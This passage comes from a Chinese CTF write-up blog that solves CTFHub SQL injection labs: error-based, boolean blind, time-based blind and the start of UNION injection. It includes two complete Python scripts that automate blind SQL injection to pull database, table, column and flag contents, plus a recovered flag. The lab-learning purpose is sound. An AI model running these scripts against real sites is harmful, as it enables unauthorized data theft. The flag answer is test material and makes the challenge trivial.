                     lazyload
                     src="/images/loading.svg"
                     data-src="https://raw.githubusercontent.com/dawnrisingDong/pic_bed/main/img/202310162047747.png"
                      alt="image-20231016204719801"
                ></p>
<hr>
<ul>
<li><h4 id="报错注入"><a href="#报错注入" class="headerlink" title="报错注入"></a>报错注入</h4>法一：函数：<code>updatexml(1,concat(...),0)  或  extractvalue(1,concat(...))</code></li>
</ul>
<p>数据库</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://raw.githubusercontent.com/dawnrisingDong/pic_bed/main/img/202310162111130.png"
                      alt="image-20231016210926658"
                ></p>
<p>表</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://raw.githubusercontent.com/dawnrisingDong/pic_bed/main/img/202310162111214.png"
                      alt="image-20231016211135162"
                ></p>
<p>有多个表。。。发现目标！</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://raw.githubusercontent.com/dawnrisingDong/pic_bed/main/img/202310162112436.png"
                      alt="image-20231016211212256"
                ></p>
<p>找字段、字段内容，同上</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://raw.githubusercontent.com/dawnrisingDong/pic_bed/main/img/202310162113231.png"
                      alt="image-20231016211349310"
                ></p>
<p>得到flag~</p>
<p>​	法二：floor()</p>
<p>先试一下能否出现报错（Duplicate entry）</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://raw.githubusercontent.com/dawnrisingDong/pic_bed/main/img/202310190852529.png"
                      alt="image-20231019085238727"
                ></p>
<p>开始注入（库、表、字段、内容）</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://raw.githubusercontent.com/dawnrisingDong/pic_bed/main/img/202310190900303.png"
                      alt="image-20231019090022987"
                ></p>
<p>（后边没金币了<del>闭了吧</del>）</p>
<p>剩余步骤与前面基本一致</p>
<hr>
<ul>
<li><h4 id="布尔盲注"><a href="#布尔盲注" class="headerlink" title="布尔盲注"></a>布尔盲注</h4></li>
</ul>
<p>数据库、表（长度、名）</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://raw.githubusercontent.com/dawnrisingDong/pic_bed/main/img/202310181559847.bmp"
                      alt="capture_20231018150717426"
                ></p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://raw.githubusercontent.com/dawnrisingDong/pic_bed/main/img/202310181618933.bmp"
                      alt="capture_20231018152046273"
                ></p>
<p>明显是“flag”表</p>
<p>字段（名）</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://raw.githubusercontent.com/dawnrisingDong/pic_bed/main/img/202310181619662.bmp"
                      alt="capture_20231018161640987"
                ></p>
<p>内容</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://raw.githubusercontent.com/dawnrisingDong/pic_bed/main/img/202310181630973.png"
                      alt="image-20231018163006908"
                ></p>
<p>得到flag~</p>
<p>脚本</p>
<div class="highlight-container" data-rel="Python"><figure class="iseeu highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> requests</span><br><span class="line">Base_URL=<span class="string">&quot;http://challenge-ed7e25e6e04a50a9.sandbox.ctfhub.com:10800/?id=&quot;</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">length_of_database</span>():</span><br><span class="line">    <span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">1</span>,<span class="number">10</span>):</span><br><span class="line">        url = Base_URL + <span class="string">&quot;1 and (select length(database()))=&#123;&#125;&quot;</span>.<span class="built_in">format</span>(i)</span><br><span class="line">        respo = requests.get(url)</span><br><span class="line">        <span class="keyword">if</span> <span class="string">&quot;query_success&quot;</span> <span class="keyword">in</span> respo.text:</span><br><span class="line">            <span class="built_in">print</span>(<span class="string">&quot;database_length = &quot;</span>,i)</span><br><span class="line">            ret = i</span><br><span class="line">            <span class="keyword">break</span></span><br><span class="line">    <span class="built_in">print</span>(<span class="string">&quot;************&quot;</span>)</span><br><span class="line">    <span class="keyword">return</span> ret</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">name_of_database</span>(<span class="params">ret</span>):</span><br><span class="line">    <span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">1</span>,ret+<span class="number">1</span>):</span><br><span class="line">        <span class="keyword">for</span> j <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">33</span>,<span class="number">127</span>):</span><br><span class="line">            url = Base_URL + <span class="string">&quot;1 and (select ascii(substr(database(),&#123;&#125;,1)))=&#123;&#125;&quot;</span>.<span class="built_in">format</span>(i,j)</span><br><span class="line">            respo = requests.get(url)</span><br><span class="line">            <span class="comment">#print(respo.text)</span></span><br><span class="line">            <span class="keyword">if</span> <span class="string">&quot;query_success&quot;</span> <span class="keyword">in</span> respo.text:</span><br><span class="line">                <span class="built_in">print</span>(<span class="built_in">chr</span>(j))</span><br><span class="line">                <span class="keyword">break</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">number_of_table</span>():</span><br><span class="line">    <span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">1</span>,<span class="number">20</span>):</span><br><span class="line">        url = Base_URL + <span class="string">&quot;1 and (select count(table_name) from information_schema.tables where table_schema=database())=&#123;&#125;&quot;</span>.<span class="built_in">format</span>(i)</span><br><span class="line">        respo = requests.get(url)</span><br><span class="line">        <span class="keyword">if</span> <span class="string">&quot;query_success&quot;</span> <span class="keyword">in</span> respo.text:</span><br><span class="line">            <span class="built_in">print</span>(<span class="string">&quot;table_number = &quot;</span>,i)</span><br><span class="line">            ret = i</span><br><span class="line">            <span class="keyword">break</span></span><br><span class="line">    <span class="built_in">print</span>(<span class="string">&quot;************&quot;</span>)</span><br><span class="line">    <span class="keyword">return</span> ret</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">length_of_table</span>(<span class="params">ret</span>):</span><br><span class="line">    <span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">0</span>, ret):</span><br><span class="line">        <span class="keyword">for</span> j <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">1</span>,<span class="number">30</span>):</span><br><span class="line">            url = Base_URL + <span class="string">&quot;1 and (select length(table_name) from information_schema.tables where table_schema=database() limit &#123;&#125;,1)=&#123;&#125;&quot;</span>.<span class="built_in">format</span>(i,j)</span><br><span class="line">            respo = requests.get(url)</span><br><span class="line">            <span class="keyword">if</span> <span class="string">&quot;query_success&quot;</span> <span class="keyword">in</span> respo.text:</span><br><span class="line">                <span class="built_in">print</span>(<span class="string">&quot;table&quot;</span>,i+<span class="number">1</span>,<span class="string">&quot;_length = &quot;</span>, j)</span><br><span class="line">                <span class="keyword">break</span></span><br><span class="line">    <span class="built_in">print</span>(<span class="string">&quot;************&quot;</span>)</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">name_of_table</span>(<span class="params">ret</span>):</span><br><span class="line">    <span class="keyword">for</span> k <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">0</span>,<span class="number">2</span>):</span><br><span class="line">        <span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">1</span>,ret+<span class="number">1</span>):</span><br><span class="line">            <span class="keyword">for</span> j <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">33</span>,<span class="number">127</span>):</span><br><span class="line">                url = Base_URL + <span class="string">&quot;1 and (select ascii(substr(table_name,&#123;&#125;,1)) from information_schema.tables where table_schema=database() limit &#123;&#125;,1)=&#123;&#125;&quot;</span>.<span class="built_in">format</span>(i,k,j)</span><br><span class="line">                respo = requests.get(url)</span><br><span class="line">                <span class="comment">#print(respo.text)</span></span><br><span class="line">                <span class="keyword">if</span> <span class="string">&quot;query_success&quot;</span> <span class="keyword">in</span> respo.text:</span><br><span class="line">                    <span class="built_in">print</span>(<span class="built_in">chr</span>(j))</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">length_of_column</span>():  <span class="comment">#应该先确定一下column的数量，犯懒就随便写了个数</span></span><br><span class="line">    <span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">0</span>, <span class="number">4</span>):</span><br><span class="line">        <span class="keyword">for</span> j <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">1</span>,<span class="number">30</span>):</span><br><span class="line">            url = Base_URL + <span class="string">&quot;1 and (select length(column_name) from information_schema.columns where table_name=&#x27;flag&#x27; limit &#123;&#125;,1)=&#123;&#125;&quot;</span>.<span class="built_in">format</span>(i,j)</span><br><span class="line">            respo = requests.get(url)</span><br><span class="line">            <span class="keyword">if</span> <span class="string">&quot;query_success&quot;</span> <span class="keyword">in</span> respo.text:</span><br><span class="line">                <span class="built_in">print</span>(<span class="string">&quot;column&quot;</span>,i+<span class="number">1</span>,<span class="string">&quot;_length = &quot;</span>, j)</span><br><span class="line">                ret = j</span><br><span class="line">                <span class="keyword">break</span></span><br><span class="line">    <span class="built_in">print</span>(<span class="string">&quot;************&quot;</span>)</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">name_of_column</span>(<span class="params">ret</span>):</span><br><span class="line">    <span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">1</span>,ret+<span class="number">1</span>):</span><br><span class="line">        <span class="keyword">for</span> j <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">33</span>,<span class="number">127</span>):</span><br><span class="line">            url = Base_URL + <span class="string">&quot;1 and (select ascii(substr(column_name,&#123;&#125;,1)) from information_schema.columns where table_name=&#x27;flag&#x27; limit 0,1)=&#123;&#125;&quot;</span>.<span class="built_in">format</span>(i,j)</span><br><span class="line">            respo = requests.get(url)</span><br><span class="line">            <span class="comment">#print(respo.text)</span></span><br><span class="line">            <span class="keyword">if</span> <span class="string">&quot;query_success&quot;</span> <span class="keyword">in</span> respo.text:</span><br><span class="line">                <span class="built_in">print</span>(<span class="built_in">chr</span>(j))</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">comment</span>():</span><br><span class="line">    <span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">1</span>,<span class="number">35</span>):</span><br><span class="line">        <span class="keyword">for</span> j <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">33</span>,<span class="number">127</span>):</span><br><span class="line">            url = Base_URL + <span class="string">&quot;1 and (select ascii(substr(flag,&#123;&#125;,1)) from flag)=&#123;&#125;&quot;</span>.<span class="built_in">format</span>(i,j)</span><br><span class="line">            respo = requests.get(url)</span><br><span class="line">            <span class="comment">#print(respo.text)</span></span><br><span class="line">            <span class="keyword">if</span> <span class="string">&quot;query_success&quot;</span> <span class="keyword">in</span> respo.text:</span><br><span class="line">                <span class="built_in">print</span>(<span class="built_in">chr</span>(j))</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">&#x27;__main__&#x27;</span>:</span><br><span class="line">    <span class="comment">#length_of_database()</span></span><br><span class="line">    <span class="comment">#name_of_database(4)</span></span><br><span class="line">    <span class="comment">#number_of_table()</span></span><br><span class="line">    <span class="comment">#length_of_table(2)</span></span><br><span class="line">    <span class="comment">#name_of_table(4)</span></span><br><span class="line">    <span class="comment">#name_of_column(4)</span></span><br><span class="line">    <span class="comment">#comment()</span></span><br></pre></td></tr></table></figure></div>

<hr>
<ul>
<li><h4 id="时间盲注"><a href="#时间盲注" class="headerlink" title="时间盲注"></a>时间盲注</h4></li>
</ul>
<p>数据库（长度，名）</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://raw.githubusercontent.com/dawnrisingDong/pic_bed/main/img/202310181659248.png"
                      alt="image-20231018165924216"
                ></p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://raw.githubusercontent.com/dawnrisingDong/pic_bed/main/img/202310181723146.png"
                      alt="image-20231018172336069"
                ></p>
<p>表（数量，长度，名）</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://raw.githubusercontent.com/dawnrisingDong/pic_bed/main/img/202310181737014.bmp"
                      alt="img"
                ></p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://raw.githubusercontent.com/dawnrisingDong/pic_bed/main/img/202310182108872.png"
                      alt="image-20231018210808926"
                ></p>
<p>字段（数量、长度、名）</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://raw.githubusercontent.com/dawnrisingDong/pic_bed/main/img/202310182120303.png"
                      alt="image-20231018212000868"
                ></p>
<p>内容</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://raw.githubusercontent.com/dawnrisingDong/pic_bed/main/img/202310182145323.bmp"
                      alt="capture_20231018213441928"
                ></p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://raw.githubusercontent.com/dawnrisingDong/pic_bed/main/img/202310182146723.bmp"
                      alt="capture_20231018214428556"
                ></p>
<p>but。。。为什么两次运行结果不一样呀？？？</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://raw.githubusercontent.com/dawnrisingDong/pic_bed/main/img/202310182151473.jpeg"
                      alt="地铁老人看手机"
                ></p>
<p>且两次的flag都不对，但综合这两个结果能猜到正确答案</p>
<p><code>ctfhub&#123;7bf40559591c338c426168c2&#125;</code></p>
<p>有点不信邪，重新打开环境试了一遍，又正确了。。</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://raw.githubusercontent.com/dawnrisingDong/pic_bed/main/img/202310182251524.png"
                      alt="image-20231018225143190"
                ></p>
<p>（附脚本，相较上一个有细节上的改进）</p>
<div class="highlight-container" data-rel="Python"><figure class="iseeu highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> time</span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> requests</span><br><span class="line">Base_URL = <span class="string">&quot;http://challenge-9e016cd2b6d7446b.sandbox.ctfhub.com:10800/?id=&quot;</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">length_of_database</span>():</span><br><span class="line">    <span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">1</span>,<span class="number">100</span>):</span><br><span class="line">        url = Base_URL + <span class="string">&quot;1 and (select length(database()))=&#123;&#125; and sleep(2)&quot;</span>.<span class="built_in">format</span>(i)</span><br><span class="line">        start_time = time.time()</span><br><span class="line">        respo = requests.get(url)           <span class="comment">#别落下！！！</span></span><br><span class="line">        <span class="comment">#print(time.time() - start_time)</span></span><br><span class="line">        <span class="keyword">if</span> time.time() - start_time &gt; <span class="number">1</span>:</span><br><span class="line">            <span class="built_in">print</span>(<span class="string">&quot;length of database = &quot;</span>,i)</span><br><span class="line">            <span class="keyword">break</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">name_of_database</span>(<span class="params">ret</span>):</span><br><span class="line">    <span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">1</span>,ret+<span class="number">1</span>):</span><br><span class="line">        <span class="keyword">for</span> j <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">33</span>,<span class="number">127</span>):</span><br><span class="line">            url = Base_URL + <span class="string">&quot;1 and ascii(substr((select database()),&#123;&#125;,1))=&#123;&#125; and sleep(2)&quot;</span>.<span class="built_in">format</span>(i,j)</span><br><span class="line">            start_time = time.time()</span><br><span class="line">            respo = requests.get(url)</span><br><span class="line">            <span class="keyword">if</span> time.time() - start_time &gt; <span class="number">1</span>:</span><br><span class="line">                <span class="built_in">print</span>(<span class="built_in">chr</span>(j))</span><br><span class="line">                <span class="keyword">break</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">number_of_tables</span>():</span><br><span class="line">    <span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">1</span>,<span class="number">100</span>):</span><br><span class="line">        url = Base_URL + <span class="string">&quot;1 and (select count(table_name) from information_schema.tables where table_schema=database())=&#123;&#125; and sleep(2)&quot;</span>.<span class="built_in">format</span>(i)</span><br><span class="line">        start_time = time.time()</span><br><span class="line">        respo = requests.get(url)           </span><br><span class="line">        <span class="comment">#print(time.time() - start_time)</span></span><br><span class="line">        <span class="keyword">if</span> time.time() - start_time &gt; <span class="number">1</span>:</span><br><span class="line">            <span class="built_in">print</span>(<span class="string">&quot;number of tables = &quot;</span>,i)</span><br><span class="line">            <span class="keyword">break</span></span><br><span class="line">    <span class="keyword">return</span> i</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">length_of_tables</span>(<span class="params">ret</span>):</span><br><span class="line">    <span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">0</span>,ret):</span><br><span class="line">        <span class="keyword">for</span> j <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">1</span>,<span class="number">30</span>):</span><br><span class="line">            url = Base_URL + <span class="string">&quot;1 and (select length(table_name) from information_schema.tables where table_schema=database() limit &#123;&#125;,1)=&#123;&#125; and sleep(2)&quot;</span>.<span class="built_in">format</span>(i,j)</span><br><span class="line">            start_time = time.time()</span><br><span class="line">            respo = requests.get(url)           </span><br><span class="line">            <span class="keyword">if</span> time.time() - start_time &gt; <span class="number">1</span>:</span><br><span class="line">                <span class="built_in">print</span>(<span class="string">&quot;length of tables&quot;</span>,i+<span class="number">1</span>,<span class="string">&quot; = &quot;</span>,j)</span><br><span class="line">                <span class="keyword">break</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">name_of_tables</span>():</span><br><span class="line">    <span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">0</span>,<span class="number">2</span>):</span><br><span class="line">        <span class="keyword">for</span> j <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">1</span>,<span class="number">5</span>):</span><br><span class="line">            <span class="keyword">for</span> k <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">33</span>,<span class="number">127</span>):</span><br><span class="line">                url = Base_URL + <span class="string">&quot;1 and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit &#123;&#125;,1),&#123;&#125;,1))=&#123;&#125; and sleep(2)&quot;</span>.<span class="built_in">format</span>(i,j,k)</span><br><span class="line">                start_time = time.time()</span><br><span class="line">                respo = requests.get(url)  </span><br><span class="line">                <span class="keyword">if</span> time.time() - start_time &gt; <span class="number">1</span>:</span><br><span class="line">                    <span class="built_in">print</span>(<span class="built_in">chr</span>(k))</span><br><span class="line">                    <span class="keyword">break</span></span><br><span class="line">        <span class="built_in">print</span>(<span class="string">&quot;~&quot;</span>)</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">number_of_columns</span>():</span><br><span class="line">    <span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">1</span>,<span class="number">100</span>):</span><br><span class="line">        url = Base_URL + <span class="string">&quot;1 and (select count(column_name) from information_schema.columns where table_name=&#x27;flag&#x27;)=&#123;&#125; and sleep(2)&quot;</span>.<span class="built_in">format</span>(i)</span><br><span class="line">        start_time = time.time()</span><br><span class="line">        respo = requests.get(url)           </span><br><span class="line">        <span class="comment">#print(time.time() - start_time)</span></span><br><span class="line">        <span class="keyword">if</span> time.time() - start_time &gt; <span class="number">1</span>:</span><br><span class="line">            <span class="built_in">print</span>(<span class="string">&quot;number of columns = &quot;</span>,i)</span><br><span class="line">            <span class="keyword">break</span></span><br><span class="line">    <span class="keyword">return</span> i</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">length_of_columns</span>():</span><br><span class="line">    <span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">1</span>,<span class="number">30</span>):</span><br><span class="line">        url = Base_URL + <span class="string">&quot;1 and (select length(column_name) from information_schema.columns where table_name=&#x27;flag&#x27; )=&#123;&#125; and sleep(2)&quot;</span>.<span class="built_in">format</span>(i)</span><br><span class="line">        start_time = time.time()</span><br><span class="line">        respo = requests.get(url)           </span><br><span class="line">        <span class="keyword">if</span> time.time() - start_time &gt; <span class="number">1</span>:</span><br><span class="line">            <span class="built_in">print</span>(<span class="string">&quot;length of columns = &quot;</span>,i)</span><br><span class="line">            <span class="keyword">break</span></span><br><span class="line">    <span class="keyword">return</span> i</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">name_of_columns</span>(<span class="params">ret</span>):</span><br><span class="line">    <span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">1</span>,ret+<span class="number">1</span>):</span><br><span class="line">        <span class="keyword">for</span> j <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">33</span>,<span class="number">127</span>):</span><br><span class="line">            url = Base_URL + <span class="string">&quot;1 and ascii(substr((select column_name from information_schema.columns where table_name=&#x27;flag&#x27;),&#123;&#125;,1))=&#123;&#125; and sleep(2)&quot;</span>.<span class="built_in">format</span>(i,j)</span><br><span class="line">            start_time = time.time()</span><br><span class="line">            respo = requests.get(url)  </span><br><span class="line">            <span class="keyword">if</span> time.time() - start_time &gt; <span class="number">1</span>:</span><br><span class="line">                <span class="built_in">print</span>(<span class="built_in">chr</span>(j))</span><br><span class="line">                <span class="keyword">break</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">length_of_content</span>():</span><br><span class="line">    <span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">1</span>,<span class="number">35</span>):           <span class="comment">#设大点，一开始太小了一直没结果</span></span><br><span class="line">        url = Base_URL + <span class="string">&quot;1 and (select length(flag) from flag )=&#123;&#125; and sleep(2)&quot;</span>.<span class="built_in">format</span>(i)</span><br><span class="line">        start_time = time.time()</span><br><span class="line">        respo = requests.get(url)           </span><br><span class="line">        <span class="keyword">if</span> time.time() - start_time &gt; <span class="number">1</span>:</span><br><span class="line">            <span class="built_in">print</span>(<span class="string">&quot;length of flag = &quot;</span>,i)</span><br><span class="line">            <span class="keyword">break</span></span><br><span class="line">    <span class="keyword">return</span> i</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">content</span>(<span class="params">ret</span>):</span><br><span class="line">    str1 = <span class="string">&quot;flag:&quot;</span></span><br><span class="line">    <span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">1</span>,ret+<span class="number">1</span>):</span><br><span class="line">        <span class="keyword">for</span> j <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">33</span>,<span class="number">127</span>):</span><br><span class="line">            url = Base_URL + <span class="string">&quot;1 and ascii(substr((select flag from flag),&#123;&#125;,1))=&#123;&#125; and sleep(2)&quot;</span>.<span class="built_in">format</span>(i,j)</span><br><span class="line">            start_time = time.time()</span><br><span class="line">            respo = requests.get(url)  </span><br><span class="line">            <span class="keyword">if</span> time.time() - start_time &gt; <span class="number">1</span>:</span><br><span class="line">                str1 += <span class="built_in">chr</span>(j)</span><br><span class="line">                <span class="keyword">break</span></span><br><span class="line">    <span class="built_in">print</span>(str1)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">&#x27;__main__&#x27;</span>:</span><br><span class="line">    <span class="comment">#length_of_database()</span></span><br><span class="line">    <span class="comment">#name_of_database(4)</span></span><br><span class="line">    <span class="comment">#number_of_tables()</span></span><br><span class="line">    <span class="comment">#length_of_tables(number_of_tables())</span></span><br><span class="line">    <span class="comment">#name_of_tables()</span></span><br><span class="line">    <span class="comment">#number_of_columns()</span></span><br><span class="line">    <span class="comment">#name_of_columns(length_of_columns())</span></span><br><span class="line">    <span class="comment">#content(length_of_content())</span></span><br></pre></td></tr></table></figure></div>

<hr>
<ul>
<li><h4 id="MySQL结构"><a href="#MySQL结构" class="headerlink" title="MySQL结构"></a>MySQL结构</h4></li>
</ul>
<p>一眼联合攻击</p>
<p>试！在Data处开始注入</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://raw.githubusercontent.com/dawnrisingDong/pic_bed/main/img/202310182207171.bmp"
                      alt="img"
                ></p>
<p>库</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://raw.githubusercontent.com/dawnrisingDong/pic_bed/main/img/202310182208611.bmp"
                      alt="capture_20231018215817861"
                ></p>
<p>表，有俩，根据前面的经验先看→“iuitvqwzeg”</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://raw.githubusercontent.com/dawnrisingDong/pic_bed/main/img/202310221524539.bmp"
                      alt="capture_20231018215936931"
                ></p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://raw.githubusercontent.com/dawnrisingDong/pic_bed/main/img/202310182209377.bmp"
                      alt="capture_20231018215951118"
                ></p>
<p>字段</p>
<p><img  
                     lazyload
